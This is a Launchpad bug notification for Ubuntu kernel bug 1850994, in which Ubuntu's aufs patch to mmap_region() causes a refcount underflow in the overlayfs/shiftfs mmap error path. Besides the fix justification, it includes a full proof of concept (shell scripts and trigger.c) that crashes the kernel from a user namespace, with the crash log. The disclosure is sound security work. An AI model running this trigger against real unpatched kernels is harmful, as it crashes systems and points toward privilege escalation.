-- Connor Kuehl <connor.ku...@canonical.com> Wed, 13 Nov 2019 14:41:52
-0800
** Changed in: linux (Ubuntu Focal)
Status: In Progress => Fix Released
--
You received this bug notification because you are a member of Kernel
Packages, which is subscribed to linux in Ubuntu.
https://bugs.launchpad.net/bugs/1850994
Title:
ubuntu-aufs-modified mmap_region() breaks refcounting in
overlayfs/shiftfs error path
Status in linux package in Ubuntu:
Fix Released
Status in linux source package in Disco:
Fix Released
Status in linux source package in Eoan:
Fix Released
Status in linux source package in Focal:
Fix Released
Bug description:
SRU Justification
Impact: overlayfs and shiftfs both replace vma->vm_file in their mmap
handlers. On error the original value is not restored, and the
reference is put for the file to which vm_file points. On upstream
kernels this is not an issue, as no callers dereference vm_file
dereference vm_file following after call_mmap() returns an error.
However, the aufs patchs change mmap_region() to replace the fput()
using a local variable with vma_fput(), which will fput() vm_file,
leading to a refcount underflow.
Fix: Restore the original vma_file value on error.
Test Case: See below.
Regression Potential: Minimal. As stated above, other callers of
call_mmap() do not dereference vma->vm_file when it returns an error,
and the one which does is fixed by these patches.
Notes: Supported kernels prior to disco are not affected as overlayfs
did not support mmap until 4.19, and shiftfs was not present in Ubuntu
kernels before disco. The issue is mitigated for overlayfs by another
bug which is preventing unprivileged mounting; a patch for this issue
will be sent separately.
---
Tested on 19.10.
Ubuntu's aufs kernel patch includes the following change (which I
interestingly
can't see in the AUFS code at
https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c):
==================================================================
+#define vma_fput(vma) vma_do_fput(vma, __func__, __LINE__)
[...]
@@ -1847,8 +1847,8 @@ unsigned long mmap_region(struct file *file, unsigned
long addr,
return addr;
unmap_and_free_vma:
+ vma_fput(vma);
vma->vm_file = NULL;
- fput(file);
/* Undo any partial mapping done by a device driver. */
unmap_region(mm, vma, prev, vma->vm_start, vma->vm_end);
[...]
+void vma_do_fput(struct vm_area_struct *vma, const char func[], int line)
+{
+ struct file *f = vma->vm_file, *pr = vma->vm_prfile;
+
+ prfile_trace(f, pr, func, line, __func__);
+ fput(f);
+ if (f && pr)
+ fput(pr);
+}
==================================================================
This means that in the case where call_mmap() returns an error to
mmap_region(),
fput() will be called on the current value of vma->vm_file instead of the
saved
file pointer. This matters if the ->mmap() handler replaces ->vm_file before
returning an error code.
overlayfs and shiftfs do that when call_mmap() on the lower filesystem fails,
see ovl_mmap() and shiftfs_mmap().
To demonstrate the issue, the PoC below mounts a shiftfs that is backed by a
FUSE filesystem with the FUSE flag FOPEN_DIRECT_IO, which causes
fuse_file_mmap()
to bail out with -ENODEV if MAP_SHARED is set.
I would have used overlayfs instead, but there is an unrelated bug that makes
it
impossible to mount overlayfs inside a user namespace:
Commit 82c0860106f264 ("UBUNTU: SAUCE: overlayfs: Propogate nosuid from lower
and upper mounts") defines SB_I_NOSUID as 0x00000010, but SB_I_USERNS_VISIBLE
already has the same value. This causes mount_too_revealing() to bail out
with a
WARN_ONCE().
Note that this PoC requires the "bindfs" package and should be executed with
"slub_debug" in the kernel commandline to get a clear crash.
==================================================================
Ubuntu 19.10 user-Standard-PC-Q35-ICH9-2009 ttyS0
user-Standard-PC-Q35-ICH9-2009 login: user
Password:
Last login: Fr Nov 1 23:45:36 CET 2019 on ttyS0
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-19-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 updates can be installed immediately.
0 of these updates are security updates.
user@user-Standard-PC-Q35-ICH9-2009:~$ ls
aufs-mmap Documents Music Public trace.dat
Desktop Downloads Pictures Templates Videos
user@user-Standard-PC-Q35-ICH9-2009:~$ cd aufs-mmap/
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic
root=UUID=f7d8d4fb-0c96-498e-b875-0b777127a332 ro console=ttyS0 slub_debug
quiet splash vt.handoff=7
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run.sh
#!/bin/sh
sync
unshare -mUr ./run2.sh
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run2.sh
#!/bin/bash
set -e
mount -t tmpfs none /tmp
mkdir -p /tmp/{lower,middle,upper}
touch /tmp/lower/foo
# mount some random FUSE filesystem with direct_io,
# doesn't really matter what it does as long as
# there's a file in it.
# (this is just to get some filesystem that can
# easily be convinced to throw errors from f_op->mmap)
bindfs -o direct_io /tmp/lower /tmp/middle
# use the FUSE filesystem to back shiftfs.
# overlayfs would also work if SB_I_NOSUID and
# SB_I_USERNS_VISIBLE weren't defined to the same
# value...
mount -t shiftfs -o mark /tmp/middle /tmp/upper
mount|grep shift
gcc -o trigger trigger.c -Wall
./trigger
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat trigger.c
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>
int main(void) {
int foofd = open("/tmp/upper/foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
void *badmap = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (badmap == MAP_FAILED) {
perror("badmap");
} else {
errx(1, "badmap worked???");
}
sleep(1);
mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
}
user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ ./run.sh
/tmp/middle on /tmp/upper type shiftfs (rw,relatime,mark)
badmap: No such device
[ 72.101721] general protection fault: 0000 [#1] SMP PTI
[ 72.111917] CPU: 1 PID: 1376 Comm: trigger Not tainted 5.3.0-19-generic
#20-Ubuntu
[ 72.124846] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS
1.12.0-1 04/01/2014
[ 72.140965] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 72.149210] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5
41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78
60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 72.167229] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
[ 72.170426] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX:
7800000000000000
[ 72.174528] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI:
ffff9c1cc48b5900
[ 72.177790] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09:
0000000000000000
[ 72.181199] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12:
ffff9c1cf1ae5790
[ 72.186306] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15:
ffff9c1cf7209740
[ 72.189705] FS: 00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000)
knlGS:0000000000000000
[ 72.193073] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 72.195390] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4:
0000000000360ee0
[ 72.198237] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 72.200557] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:
0000000000000400
[ 72.202815] Call Trace:
[ 72.203712] mmap_region+0x417/0x670
[ 72.204868] do_mmap+0x3a8/0x580
[ 72.205939] vm_mmap_pgoff+0xcb/0x120
[ 72.207954] ksys_mmap_pgoff+0x1ca/0x2a0
[ 72.210078] __x64_sys_mmap+0x33/0x40
[ 72.211327] do_syscall_64+0x5a/0x130
[ 72.212538] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 72.214177] RIP: 0033:0x7faa3ecc7af6
[ 72.215352] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48
89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00
f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 72.222275] RSP: 002b:00007ffd0fc44c68 EFLAGS: 00000246 ORIG_RAX:
0000000000000009
[ 72.224714] RAX: ffffffffffffffda RBX: 0000000000000001 RCX:
00007faa3ecc7af6
[ 72.228123] RDX: 0000000000000001 RSI: 0000000000001000 RDI:
0000000000000000
[ 72.230913] RBP: 0000000000000000 R08: 0000000000000003 R09:
0000000000000000
[ 72.233193] R10: 0000000000000001 R11: 0000000000000246 R12:
0000556248213100
[ 72.235448] R13: 00007ffd0fc44d70 R14: 0000000000000000 R15:
0000000000000000
[ 72.237681] Modules linked in: shiftfs intel_rapl_msr
snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core
snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_common
crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64
crypto_simd snd_seq cryptd glue_helper joydev input_leds serio_raw
snd_seq_device snd_timer snd qxl ttm soundcore qemu_fw_cfg drm_kms_helper drm
fb_sys_fops syscopyarea sysfillrect sysimgblt mac_hid sch_fq_codel parport_pc
ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid
virtio_net net_failover failover ahci psmouse lpc_ich i2c_i801 libahci
virtio_blk
[ 72.257673] ---[ end trace 5d85e7b7b0bae5f5 ]---
[ 72.259237] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 72.260990] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5
41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78
60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 72.269615] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
[ 72.271414] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX:
7800000000000000
[ 72.273893] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI:
ffff9c1cc48b5900
[ 72.276354] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09:
0000000000000000
[ 72.278796] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12:
ffff9c1cf1ae5790
[ 72.281095] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15:
ffff9c1cf7209740
[ 72.284048] FS: 00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000)
knlGS:0000000000000000
[ 72.287161] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 72.289164] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4:
0000000000360ee0
[ 72.291953] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 72.294487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:
0000000000000400
==================================================================
Faulting code:
0000000F 55 push rbp
00000010 4889E5 mov rbp,rsp
00000013 4157 push r15
00000015 4156 push r14
00000017 4155 push r13
00000019 4154 push r12
0000001B 488B87C8000000 mov rax,[rdi+0xc8]
00000022 4C8B6810 mov r13,[rax+0x10]
00000026 498B4528 mov rax,[r13+0x28]
0000002A 4883786000 cmp qword [rax+0x60],byte +0x0 <<<< GPF HERE
0000002F 0F8497000000 jz near 0xcc
00000035 4989FC mov r12,rdi
00000038 4989F6 mov r14,rsi
As you can see, the poison value 6b6b6b6b6b6b6b6b is being
dereferenced.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1850994/+subscriptions
--
Mailing list: https://launchpad.net/~kernel-packages
Post to : kernel-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~kernel-packages
More help : https://help.launchpad.net/ListHelp
